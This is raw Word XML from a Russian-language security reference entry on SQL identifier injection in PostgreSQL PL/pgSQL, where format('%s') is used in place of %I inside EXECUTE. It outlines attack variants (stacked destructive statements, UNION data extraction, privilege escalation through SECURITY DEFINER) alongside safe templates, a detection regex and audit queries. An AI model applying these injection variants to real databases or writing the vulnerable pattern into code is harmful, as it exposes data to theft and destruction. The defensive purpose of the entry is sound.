      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">schema.table</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">отдельная пара `%I`-вызовов</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> или предварительный split:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- Когда tbl_name может быть "schema.table"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">EXECUTE format('SELECT COUNT(*) FROM %I.%I', schema_name, table_name) INTO result;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">format('%I.%I', 'sch', 'tbl')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"sch"."tbl"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Если split не делать (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">format('%I', 'sch.tbl')</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) — Postgres интерпретирует весь string как одно имя </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">"sch.tbl"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, что </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">не равно</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sch.tbl</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Variant A — RCE/destructive operation через stacked statements внутри EXECUTE. Variant B — extraction скрытых данных через UNION в SELECT-form. Если функция SECURITY DEFINER и owner = superuser, payload эскалирует до full DBA-level operations.</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SQL-statements от owner функции, не от caller (потому что SECURITY DEFINER переключает current_user). DROP/INSERT/CREATE от superuser-owned функции, вызванной обычной ролью — критичный сигнал.</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log_min_messages = error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relation "..." does not exist</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> с длинными подозрительными именами — индикатор failed identifier injection.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ddl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log_statement = mod</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: DROP/INSERT внутри EXECUTE в plpgsql-функции при </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">log_statement</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> уровне above none — будут логироваться.</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PostgreSQL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 plpgsql:</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Парсит SQL-string sequentially</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Документация (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">PL/pgSQL - Executing Dynamic Commands</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">): *"The string expression must yield a string containing SQL commands... If the command returns rows... result can be assigned to a record or row variable."* В отличие от Wire Protocol simple/extended-режимов (3.5),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 plpgsql </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">всегда</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> обрабатывает text-SQL и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">всегда</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> допускает multi-statement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не protocol-mode-dependent</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fixed behavior plpgsql executor</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`format('%s', x)` подставляет x как plain string</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Документация (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">String Functions and Operators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formats the argument value as a simple string. A null value is treated as an empty string."* Никакого quoting нет — это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">C-printf-стиль</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Это design-decision: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 общая string substitution,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 identifier-specific, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">%L</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — literal-specific.</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`%I` правильно обрабатывает идентификаторы</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Документация: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treats the argument value as an SQL identifier, double-quoting it if necessary. It is an error for the value to be null (equivalent to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 функциональные эквиваленты;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чуть удобнее в format-string.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Корень ошибки </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">R18</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — путаница в семантике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(C-printf vs SQL identifier). Разработчики, знакомые с Python </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">str.format()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> или C </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">sprintf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, инстинктивно пишут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для всех substitutions — и в plpgsql это создаёт уязвимость для identifier-position.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Сочетание этих трёх фактов даёт identifier-injection через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">format('%s', tbl_name)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: payload интерпретируется как multi-statement SQL внутри EXECUTE.</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с plpgsql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функцией (с 9.1, август 2011). До 9.1 функция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отсутствовала — использовали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напрямую, что концептуально одинаково.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EXECUTE на уязвимую plpgsql-функцию. Без SECURITY DEFINER — нужны те же права, что у caller (RCE/DROP внутри функции исполняется под caller). С SECURITY DEFINER (3.16.5) — права owner функции.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format('%s', x)</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format(... %s ...)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> в position, где x — identifier; либо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пропущен.</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Dynamic SQL в plpgsql — стандартный паттерн для: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Multi-tenant routing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (выбор таблицы по tenant-name)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Generic CRUD-функций</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (один helper для разных таблиц с одинаковой схемой)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Reporting frameworks</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (динамический select-list)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Schema management</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (CREATE/ALTER/DROP с computed именами)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Корректные шаблоны:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- Шаблон 1: identifier через %I</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app.get_count(tbl_name text)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">RETURNS bigint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result bigint;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EXECUTE format('SELECT COUNT(*) FROM %I', tbl_name) INTO result;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    RETURN result;</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Шаблон 2: identifier + value через USING (см. 3.16.3)</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app.get_by_id(tbl_name text, row_id int)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">RETURNS jsonb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result jsonb;</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EXECUTE format('SELECT to_jsonb(t) FROM %I AS t WHERE id = $1', tbl_name)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        INTO result USING row_id;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    RETURN result;</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Шаблон 3: schema-qualified</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app.get_count_qual(schema_name text, tbl_name text)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">RETURNS bigint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result bigint;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EXECUTE format('SELECT COUNT(*) FROM %I.%I', schema_name, tbl_name) INTO result;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    RETURN result;</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(на plpgsql коде через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_dump</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pg_proc.prosrc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">): regex </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">format\s*\([^)]*%s[^)]*[a-z_]+\b</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> где аргумент похож на identifier (tbl, table_name, col, column_name). Альтернатива — AST-walk через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_query</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> parser.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внутри EXECUTE plpgsql-функции — необычные statements (DROP, INSERT в non-typical tables, UNION в простых SELECT). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">query</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> поле может показать вычисленную форму dynamic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 после deployment запрос всех функций с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">prosrc LIKE '%format%' AND prosrc NOT LIKE '%\\%I%'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — потенциальные уязвимые места.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Application-логи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relation "..." does not exist</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> от user-driven endpoint с длинным/подозрительным relation name — индикатор failed identifier injection.</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Функция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доступна с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">PostgreSQL 9.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (сентябрь 2011).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с очень ранних версий (6.x). Конструкция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появилась вместе с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Никакие фиксы не закрывают этот класс — это design-feature plpgsql executor + разработчик-ошибка R18.</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3.16.2 quote_ident ограничения</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — функциональный эквивалент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со своими ограничениями.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3.16.3 EXECUTE ... USING</w:t>
      </w:r>
      <w:r>
        <w:rPr>
